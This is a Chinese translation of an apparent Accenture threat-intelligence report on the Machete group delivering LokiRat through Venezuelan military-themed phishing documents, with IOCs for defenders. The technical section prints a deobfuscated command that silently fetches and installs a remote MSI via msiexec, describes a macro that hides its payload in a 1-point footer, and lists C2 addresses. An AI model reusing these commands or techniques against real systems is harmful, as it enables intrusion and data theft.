Machete组织使用军事主题钓鱼邮件投递LokiRat

  • A+
所属分类:安全新闻

Machete是一个与Machete恶意软件家族有关西班牙网络间谍威胁组织,ACTI的研究人员在2020年10月对一个开源恶意软件库中识别出的样本进行分析时,发现该组织利用军事主题的诱饵投递LokiRatACTI观察到这个远程管理工具可以在巴西暗网论坛和在线代码库上免费获得这是ACTI首次观察到Machete组织将LokiRat代码集成到他们的工具集中。

关键字Machete组织;LokiRat鱼叉式钓鱼邮件


一、背景

MacheteAccenture网络威胁情报部门称为“BULLSHARK自2010年以来一直活跃,该威胁组织主要针对拉丁美洲的军事和政府组织(特别是委内瑞拉、厄瓜多尔和哥伦比亚的军事和政府组织)进行网络入侵。


二、归因

ACTI根据诱饵文档的元数据是由西班牙语写的键盘记录器代码定位系统也是用西班牙语设置的,以及与过去ACTI分析的Machete活动中使用的Python代码高度重叠等特性,将LokiRat活动归因为Machete威胁组织

从使用的鱼叉式诱饵文档来看,这次攻击似乎以委内瑞拉军队为目标,属于该组织的典型目标范围。根据评估的被攻击者和所观察到的战术、技术和程序(TTP),ACTI评估Machete很可能与拉丁美洲或附近的未知政府有关。
该代码和基础结构还包含俄语字符串,并不意味着属于俄罗斯组织。例如,在下面显示的代码段中,攻击HTTP中的一个请求字段`Black_Lightning`更改为`Utopiya_Nyusha_Maksim`,这表明更改是发生在代码开发完成之后的,而不是开发的产物。ACTI评估认为俄语字符串很可能是威胁者试图扰乱归因结果的手段。

Machete组织使用军事主题钓鱼邮件投递LokiRat

1 2019年的Machete代码

Machete组织使用军事主题钓鱼邮件投递LokiRat

2 2020年的Machete代码

三、鱼叉式网络钓鱼诱饵模仿军事文件

ESET2019年记录,Machete组织在他们的网络钓鱼活动中使用真实的军事文件作为诱饵,而这次活动使用的诱饵可能是一份被盗的委内瑞拉军事文件也遵循了这一规律。攻击者将诱饵在伪装成武器档案的文件中,该文件扩展名为.doc却内含ActiveMime恶意宏。

Machete组织使用军事主题钓鱼邮件投递LokiRat

3 其中一个诱饵的例子
攻击者使用ActiveMime来混淆诱饵ActiveMime用于对恶意宏进行编码和压缩帮助宏规避反病毒产品和其他用于识别恶意代码字符串的防御手段。由于诱饵伪装成.doc文件,受害者在收到它时通常会以为这只是个普通Word文档。

四、将LokiRat添加到工具集

在此次最新的攻击中,Machete第一次LokiRatpython代码集成到了自定义的Machete代码中。之前活动和最近活动的代码相似性支持了ACTI的评估,即在此次攻击中LokiRat已集成到该组织定制的恶意软件中
LokiRat提供的大多数核心功能已经存在于Machete框架中很多年了,但是LokiRat代码为攻击者提供了一些新的功能首先,操作者可以通过include函数获取Machete的可用功能
  • ChromeFireFox中提取浏览器密码

  • 捕获按键

  • 截屏

  • 通过删除LokitRat和辅助python文件实现自我清理

  • 创建、修改和删除文件

下面的屏幕截图显示了2019Machete活动中的键盘记录功能代码。

Machete组织使用军事主题钓鱼邮件投递LokiRat

4 2019年的键盘记录功能代码
下面的屏幕截图捕获了此活动中使用的类似代码。

Machete组织使用军事主题钓鱼邮件投递LokiRat

5 2020年的键盘记录功能代码
其次,它允许Machete运算符使用HTTP而不是FTP协议进行通信,后者提供用于登录命令和控制(C2)服务器的用户名和密码。LokiRat代码还通过执行以下命令帮助受攻击主机和C2服务器之间进行交互
  • 上传/下载文件

  • 运行本机shell命令

  • 压缩存档

五、结论

Machete从事网络间谍活动由来已久,该组织以针对拉丁美洲实体而闻名,但安全厂商报道的相关内容较少。研究人员对Machete的主要工具进行了彻底的分析,从而提高了反恶意软件解决方案的检测率。不断发展的策略和利用的开源代码至少可以让恶意软件在短时间内不被发现。

MITRE ATT&CK® Techniques

策略
技术ID
技术名称
Initial Access
T1566.001
Spearphishing Attachment
Execution
T1059
T1053
T1064
Command-line InterfaceScheduled TaskScripting
Persistence
T1053
Scheduled Task
Discovery
T1083
T1082
File and Directory DiscoverySystem Information Discovery
Collection
T1119
T1074
Automated CollectionData Staged
Command and Control
T1041
Exfiltration Over Command and Control Channel

六、技术细节

首次访问

此活动中的鱼叉式网络钓鱼诱饵文档已被上传到VirusTotal,似乎是对之前报道中使用的委内瑞拉内部军事备忘录中的图片进行了复制,这些图片很可能是在先前攻击中从委内瑞拉军队中窃取的。附录12显示了该活动中使用的图片示例。

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录1:鱼叉式钓鱼诱饵图片

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录2用于鱼叉钓鱼的诱饵
Machete设置了包含恶意宏的ActiveMime文件,并将其伪装成“.doc”文件。
诱导文件执行
这些文档包含恶意的VBA,为了防止用户使用Word读取代码的内容内容密码保护但可以使用OleVBA工具读取代码,如附录3中所示

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录3:恶意宏的内容
为了确保用户打开文档时启动恶意宏,VBA代码包含两个功能同的自动启动方法:`Sub AutoOpen()``Sub Auto_Open()`
VBA宏连接单字节字符,并创建代表文件名字符串`C:ProgramData0011g.vbe`,该文件名将保存写入诱饵文档中并在下一步中执行VBScript代码。
为了在Word文档中隐藏恶意VBScript内容,恶意软件作者使用人眼不可见1号字体将字符串写到文档的页脚中。VBA宏使用以下代码提取字符串:
`With ActiveDocument.Sections(1)
Dim Wrd As String
Wrd = .Footers(wdHeaderFooterPrimary).Range.Text`
然后将字符串写入先前创建的文件中:
`C:ProgramData0011g.vbe`
VBScript的原始内容是:

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录4:恶意VBScript的内容
消除混淆的VBScript是:
`C:WindowsSystem32cmd.exe" /NOCONSOLE /c msiexec /q /i https://cutt.ly/LgliNoc`
VBScript使用缩短的URL`https://cut[.]ly/LgliNoc`(原始URL`https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi`执行msiexec来获取MSI文件MSI文件的内容如附录5所示:

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录5MSl内容
LokiRat安装阶段
MSI文件包含两个文件:良性DLL文件和名为`bz.WrappedSetupProgram`的文件。
恶意内容存在于压缩文件`bz.WrappedSetupProgram`CAB文件包含141个目录和1,278个文件,其中的内容被保存到`%appdata% `目录中。
执行后,文档将启动一个名为`Projec.exe`的可移植可执行文件。
如图附录6所示,该可执行文件将休眠60隐藏当前窗口`WinExec`使用的运行命令如下
`cmd /NOCONSOLE /c mplayerUpdatewmplayer.exe mplayerPresk`

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录6projecc的主要功能
开发人员将合法的Python2.7`pythonw.exe`解释器文件重命名为`Updatewmplayer.exe`该文件在`mplayerPresk`Python代码启动`Presk`设置了LokiRat并执行以下操作:
  • `KMPlayer`的目录属性更改为HIDDEN

  • 删除不再需要执行的文件`Projec.exe`

  • 创建一个持久任务,该任务使用参数:

    `\KMPlayer\mplayer\Lib\site-packages\Player\Datawmplayer`执行合法的已重命名的Python解释器`Updatewmplayer.exe`

文件`Datawmplayer`LokiRat的修改版本,执行后RAT从以下位置读取文本文件:
`\KMPlayer\mplayer\Lib\site-packages\Player\license.dll`(注意虚假的.dll扩展名)
LokiRat命令和控制
最初`license.dll`文件包含URLhttps://ultracifrado.blogspot[.]com/ 作为Base64编码的字符串,该域名内容如附录7所示。

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录7:恶意域名内容
RAT与上述域名通信,并执行以下命令和控制(C2)操作:
  • https://ultracifrado.blogspot[.]com域名发出请求,并解析响应的内容。

  • 搜索字符串分隔符`amar`并使用Base64对内容进行解码。

  • 将解码后的字符串用于植入C2通信的后门

ACTI分析师捕获到该活动中使用的C2域名为:http://31.207.45[.]243:8080
在撰写本文时,域名`https://ultracifrado.blogspot.com/`包含的代码表明这两个域名也用于其他Machete活动
  • http://185.70.187[.]110/Rumpwltop.php

  • https://surgutneftegazappstore[.]com/KK2/katiusk.php


LokiRat功能
LokiRat修改版的帮助信息里介绍了它的主要功能,如附录8所示

Machete组织使用军事主题钓鱼邮件投递LokiRat

附录8LokiRat的功能
辅助Python文件
以下python文件用于补充LokiRat的功能,大部分代码已在之前的Machete活动中重复使用过。
  • Presk创建持久性机制。该代码创建了一个名为Datawmplayer的计划任务,每5分钟运行一次,该任务执行的LokiRat主要有效负载存储在`\KMPlayer\mplayer\Lib\site-packages\Player\Datawmplayer`中。

  • Dropmplayer%appdata%\Microsoft\WindowsCenter\dream下创建一个目录,用于存储从ChromeSafariOperaFireFox提取并压缩的.zip数据。

  • wmUpdate包含使用西班牙语的针对系统键盘记录功能的代码,键盘记录存储在`\KMPlayer\mplayer\Lib\site-packages\Player\-vpr.html`中。

IOCs
为了缓解这一攻击,ACTI建议检查网络日志中与这些后门相关的指标,包括以下IOC
SHA256
文件名
类别
2a9a9e9d927993ce878125868526fb6d288325b5ced041f75fabce8dede62657
plan de defensa 001.doc
Malicious Document
8db7f295d8711de2773e5015a8ed6e067a51d4f34f173936b3ccee718937a6c2
armamento 001.doc
Malicious Document
89458aa5e86a632cef1c9c56906ba8ac6b60bb692d77e3fb28d38bd70bb55907
mplayer.msi
MSI
009ae97fdc8fe93303f096d5a488aa0ae9e612d6d609f89e1409dd69ef2fa95f
Binary.bz.WrappedSetupProgram
CAB
38c46066a655f270d9f587e3654d97b94245ffd4ba5748d12540f942ed9f0d4b
Projec.exe
Installer
ca0df6cccf2a15ce8f781d81959cf230aead64e6297a3283b21457dc74938c89
Presk
Aux python file
2b6b6307b0b1186eec6d7b1e4f181767ea7ade1cc1d4e1374e10422bf7ea63dd
Datawmplayer
LokiRat
e328cb7bf8cdaa770370af9d56a009dca5923dc3569ff4ae5fc7e94d80a5194b
Dropmplayer
Aux python file
C&C URLs
  • http://185.70.187[.]110/Rumpwltop.php

  • https://surgutneftegazappstore[.]com/KK2/katiusk.php

  • https://cutt[.]ly/LgliNoc

  • https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi


end



为CNTIC编译,不代表本公众号观点,转载请保留出处与链接。

联系信息进入公众号后点击“论坛信息”可见。

原文链接:
https://www.accenture.com/us-en/blogs/cyber-defense/machete-adopts-lokirat-toolset
原文标题:Machete adopts LokiRat as part of their toolset
编译:CNTIC情报组


Machete组织使用军事主题钓鱼邮件投递LokiRat

本文始发于微信公众号(国家网络威胁情报共享开放平台):Machete组织使用军事主题钓鱼邮件投递LokiRat

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: